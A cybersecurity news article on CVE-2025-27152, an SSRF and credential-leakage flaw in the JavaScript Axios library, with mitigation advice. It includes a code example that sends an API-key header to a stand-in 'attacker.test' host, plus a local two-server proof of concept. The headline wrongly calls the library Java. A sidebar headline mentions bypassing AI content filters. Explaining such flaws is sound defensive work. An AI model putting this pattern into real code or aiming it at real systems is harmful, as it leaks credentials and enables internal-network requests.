Cyber Security News

Java Axios Package Vulnerability Threatens Millions of Servers with SSRF Exploit

A critical security issue has been identified in the Axios package for JavaScript, which poses significant risks to millions of servers due to server-side request forgery (SSRF) and credential leakage.

This vulnerability occurs when absolute URLs are used in Axios requests, even when a base URL is specified.

CVE-2025-27152 Overview

The vulnerability associated with Axios is identified by the CVE ID CVE-2025-27152. It affects versions of Axios less than or equal to 1.7.9 and has been rated with a moderate severity level.

import axios from "axios";

const internalAPIClient = axios.create({

  baseURL: "http://example.test/api/v1/users/",

  headers: {

    "X-API-KEY": "1234567890",

  },

});

// Example of an absolute URL being passed

const userId = "http://attacker.test/";

// SSRF Vulnerability Example

await internalAPIClient.get(userId); // Sends request to http://attacker.test/ instead of the baseURL

In the code snippet above, even though a base URL is set for the Axios client, passing an absolute URL to the get() method leads to requests being sent directly to the specified absolute URL.

This bypasses the intended security mechanisms, as sensitive credentials such as the X-API-KEY are included in the request headers and can be leaked to unintended hosts.

Proof of Concept

To demonstrate this vulnerability, a simple proof of concept (PoC) can be set up using two local HTTP servers.

  1. Setup Servers:
mkdir /tmp/server1 /tmp/server2

echo "this is server1" > /tmp/server1/index.html

echo "this is server2" > /tmp/server2/index.html

python -m http.server -d /tmp/server1 10001 &

python -m http.server -d /tmp/server2 10002 &
  1. Create a Test Script (main.js):
import axios from "axios";

const client = axios.create({ baseURL: "http://localhost:10001/" });

const response = await client.get("http://localhost:10002/");

console.log(response.data);
  1. Run the Script:
node main.js

The output will be “this is server2,” indicating that the request was successfully redirected to the unintended server.

Impact and Mitigation

The vulnerability poses two main risks:

  • Credential Leakage: Sensitive API keys or credentials might be exposed to third-party hosts if an absolute URL is passed.
  • SSRF (Server-Side Request Forgery): Attackers can leverage this exploit to make unauthorized requests to internal network hosts.

To mitigate this risk, users should update to Axios version 1.8.2 or later, where the issue has been fixed. Additionally, implementing strict validation for any user-provided URLs is crucial to prevent SSRF attacks.

The vulnerability was reported by @lambdasawa shared in Github, adding emphasis on the importance of community involvement in software security.

This recent security issue highlights the need for diligence in managing dependencies and validating inputs, especially with widely used libraries like Axios.

By updating to patched versions and enforcing robust security practices, developers can protect their applications and internal networks from SSRF and credential leakage threats.

Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free. 

Divya

Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Recent Posts

BFDOOR Malware Targets Organizations to Establish Long-Term Persistence

The BPFDoor malware has emerged as a significant threat targeting domestic and international organizations, particularly…

3 hours ago

Uncovering the Security Risks of Data Exposure in AI-Powered Tools like Snowflake’s CORTEX

As artificial intelligence continues to reshape the technological landscape, tools like Snowflake’s CORTEX Search Service…

3 hours ago

UNC3944 Hackers Shift from SIM Swapping to Ransomware and Data Extortion

UNC3944, a financially-motivated threat actor also linked to the group known as Scattered Spider, has…

3 hours ago

Over 2,800 Hacked Websites Targeting MacOS Users with AMOS Stealer Malware

Cybersecurity researcher has uncovered a massive malware campaign targeting MacOS users through approximately 2,800 compromised…

4 hours ago

Hackers Bypass AI Filters from Microsoft, Nvidia, and Meta Using a Simple Emoji

Cybersecurity researchers have uncovered a critical flaw in the content moderation systems of AI models…

5 hours ago

Microsoft Alerts That Default Helm Charts May Expose Kubernetes Apps to Data Leaks

Microsoft’s cybersecurity research team has issued a stark warning about the risks of using default…

5 hours ago